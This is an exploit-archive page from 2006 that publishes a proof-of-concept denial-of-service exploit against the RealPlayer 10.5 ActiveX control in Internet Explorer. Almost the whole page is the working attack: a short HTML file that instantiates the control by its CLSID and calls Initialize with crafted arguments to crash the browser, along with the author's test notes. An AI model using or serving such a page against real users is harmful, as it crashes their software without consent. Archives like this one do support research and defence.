[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : RealPlayer 10.5 (ActiveX Control) Denial of Service Exploit
# Published : 2006-12-20
# Author : shinnai
# Previous Title : DREAM FTP Server 1.0.2 (PORT) Remote Denial of Service Exploit
# Next Title : MS Windows (MessageBox) Memory Corruption Local Denial of Service
<!--
---------------------------------------------------------------------------
RealPlayer 10.5 rpau3260.dll Internet Explorer Denial of Service
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
---------------------------------------------------------------------------
-->
<html>
<body>
<object classid="clsid:405DE7C0-E7DD-11D2-92C5-00C0F01F77C1" id="RealPlayer">
</object>
<script>
RealPlayer.Initialize("AA","defaultV")
</script>
</html>
</body>
<!--
Just initialize the control, the close IE :)
-->
# www.Syue.com [2006-12-20]